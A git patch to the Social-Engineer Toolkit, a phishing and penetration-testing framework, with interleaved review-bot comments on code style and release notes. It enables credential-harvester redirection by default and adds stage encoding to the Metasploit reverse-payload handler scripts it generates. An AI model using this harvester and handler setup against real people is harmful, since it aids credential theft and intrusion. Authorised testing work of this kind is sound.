From 470295a861c0efb82e72183ba9538bcc0077493f Mon Sep 17 00:00:00 2001
From: TrustedSec
Date: Thu, 18 Apr 2013 17:54:59 -0400
Subject: [PATCH] Added new features to second stage encoding from Metasploit
---
 config/set_config | 2 +-
 readme/CHANGES | 7 +++++++
 src/core/payloadgen/create_payloads.py | 3 ++-
 src/core/set.py | 24 ++++++------------------
 src/core/setcore.py | 2 +-
 5 files changed, 17 insertions(+), 21 deletions(-)
diff --git a/config/set_config b/config/set_config
index d926fb443..e37f3e956 100644
--- a/config/set_config
+++ b/config/set_config
@@ -180,7 +180,7 @@ UPX_PATH=/usr/bin/upx
 ### This feature will turn on or off the automatic redirection. By default for example in multi-attack
 ### the site will redirect once one successful attack is used. Some people may want to use Java applet
 ### and credential harvester for example.
-AUTO_REDIRECT=OFF
+AUTO_REDIRECT=ON
 #
 ### This will redirect the harvester victim to this website once executed and not to the original website.
 ### For example if you clone abcompany.com and below it says blahblahcompany.com, it will redirect there instead.
diff --git a/readme/CHANGES b/readme/CHANGES
index 9a3b868dd..198e9ae0b 100644
--- a/readme/CHANGES
+++ b/readme/CHANGES
@@ -1,3 +1,10 @@
+~~~~~~~~~~~~~~~~
+version 5.0.3
+~~~~~~~~~~~~~~~~
+
+* added set EnableStageEncoding true to default to encode the second stage with Shikata Ga Nai
+* fixed an issue that would cause webjacking to go back to the mlitm
+
 ~~~~~~~~~~~~~~~~
 version 5.0.2
 ~~~~~~~~~~~~~~~~
diff --git a/src/core/payloadgen/create_payloads.py b/src/core/payloadgen/create_payloads.py
index b8466dd47..3d610b500 100644
--- a/src/core/payloadgen/create_payloads.py
+++ b/src/core/payloadgen/create_payloads.py
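Review bot: The default for AUTO_REDIRECT flips from OFF to ON, but neither the commit subject nor the new readme/CHANGES entry in this same patch records it, so anyone upgrading gets a changed default with no notice. The comment block above the key explains what the option does but never states its default, so a one-line addition there would help, e.g. `### Default: ON as of 5.0.3 (was OFF).` A matching bullet under the 5.0.3 heading in readme/CHANGES would make the change discoverable alongside the stage-encoding note.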
@@ -419,7 +419,7 @@ try:
 filewrite = file("%s/meta_config_multipyinjector" % (setdir), "a")
 port_check = check_ports("%s/meta_config_multipyinjector" % (setdir), shellcode_port)
 if port_check == False:
- filewrite.write("use exploit/multi/handler\nset PAYLOAD %s\nset LHOST 0.0.0.0\nset LPORT %s\nset ExitOnSession false\nexploit -j\n\n" % (choice9,shellcode_port))
+ filewrite.write("use exploit/multi/handler\nset PAYLOAD %s\nset LHOST 0.0.0.0\nset LPORT %s\nset ExitOnSession false\nset EnableStageEncoding true\nexploit -j\n\n" % (choice9,shellcode_port))
 filewrite.close()
 if validate_ip(choice2) == False:
@@ -670,6 +670,7 @@ try:
 if flag == 0:
 filewrite.write("set LPORT "+choice3+"\n")
+ filewrite.write("set EnableStageEncoding true\n")
 filewrite.write("set ExitOnSession false\n")
 if auto_migrate == "ON":
diff --git a/src/core/set.py b/src/core/set.py
index a43afcaf7..e3dfb39cc 100755
--- a/src/core/set.py
+++ b/src/core/set.py
@@ -161,10 +161,8 @@ try:
 return_continue()
 break
- # Web Attack menu choice 5: Man Left in the Middle Attack Method
- if attack_vector == "5":
- choice3 = '0'
- if attack_vector != "5":
+ # Removed to delete MLITM
+ if attack_vector != "99999":
 ###################################################
 # USER INPUT: SHOW WEB ATTACK VECTORS MENU
 # 
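Review bot: In the first hunk the new `set EnableStageEncoding true` directive is spliced into a single format string that now carries seven handler lines, so a reader has to scan the whole literal to find what changed, whereas the second hunk (@@ -670) writes the same directive as its own `filewrite.write("set EnableStageEncoding true\n")` call. Splitting the first write into one `filewrite.write(...)` per directive, as the second site already does, would make the two generators consistent and keep future additions reviewable line by line. Both hunks emit the directive unconditionally while the neighbouring `auto_migrate` directive is config-driven; if always-on is intended, a short comment at each site stating that would record the rationale, which the hunk currently lacks. The enclosing `try:` blocks begin outside both hunks.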
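Review bot: `if attack_vector != "99999":` is a guard that can never be false for the menu strings handled here, so the block it introduces is now effectively unconditional while still indented one level and reading like a real branch; the comment `# Removed to delete MLITM` says what was deleted but not why the sentinel remains. If dedenting the block is out of scope for this commit (its end lies well beyond the hunk), the comment should say so explicitly, e.g. `# MLITM (old choice 5) removed; always-true guard kept to avoid re-indenting the menu block below`. Dropping the `choice3 = '0'` assignment is consistent with the deletion at @@ -682, but it is worth confirming that no other path in this function still expects `choice3` to be pre-set for the removed vector.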
@@ -383,17 +381,16 @@ try:
 # cred harvester for auto site here
 if attack_vector == "harvester" or attack_vector == "tabnabbing" or attack_vector == "webjacking":
 if attack_vector == "tabnabbing" or attack_vector == "webjacking":
- sys.path.append("src/webattack/tabnabbing")
 debug_msg(me, "importing 'src.webattack.tabnabbing.tabnabbing'", 1)
- try:reload(tabnabbing)
- except: import tabnabbing
+ try:reload(src.webattack.tabnabbing)
+ except: import src.webattack.tabnabbing
 # start web cred harvester here
 sys.path.append("src/webattack/harvester")
 debug_msg(me, "importing 'src.webattack.harvester.harvester'", 1)
 try:
- reload(harvester)
+ reload(src.webattack.harvester)
 except:
- import harvester
+ import src.webattack.harvester
 # if we are using profiler lets prep everything to get ready
 if attack_vector == "profiler":
@@ -682,15 +679,6 @@ try:
 import src.webattack.multi_attack.multiattack
- # option for thebiz man left in the middle attack vector
- if choice3 == '0':
- sys.path.append("src/webattack/mlitm")
- debug_msg(me, "importing 'src.webattack.mlitm.thebiz'", 1)
- try:
- reload(thebiz)
- except:
- import thebiz
-
 # Return to main menu
 if choice3 == '4':
 print (" Returning to main menu.\n")
diff --git a/src/core/setcore.py b/src/core/setcore.py
index 1de8a60fe..9fba02f3e 100644
--- a/src/core/setcore.py
+++ b/src/core/setcore.py
@@ -229,7 +229,7 @@ def print_error(message):
 print bcolors.RED + bcolors.BOLD + "[!] " + bcolors.ENDC + bcolors.RED + str(message) + bcolors.ENDC
 def get_version():
- define_version = '5.0.2'
+ define_version = '5.0.3'
 return define_version
 class create_menu:
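Review bot: The new imports stop at the package level — `import src.webattack.tabnabbing` and `import src.webattack.harvester` — while the debug messages on the adjacent context lines still announce `src.webattack.tabnabbing.tabnabbing` and `src.webattack.harvester.harvester`, and the later hunk at @@ -682 imports a full module path, `src.webattack.multi_attack.multiattack`. Unless each package `__init__` imports its submodule (not visible here), `reload(src.webattack.tabnabbing)` re-executes only the package and the module named in the debug message may never run; importing the full path, e.g. `import src.webattack.tabnabbing.tabnabbing`, would match both the log line and the multiattack site. The `sys.path.append("src/webattack/harvester")` context line looks like a leftover now that its tabnabbing twin is removed in this hunk and the harvester import is package-qualified. The bare `except:` around these imports presumably exists so that the first pass, where `src` or the attribute is not yet bound, falls through to the import, but it also swallows an ImportError raised inside the module itself; `except (NameError, AttributeError):` would keep the retry behaviour without hiding real failures.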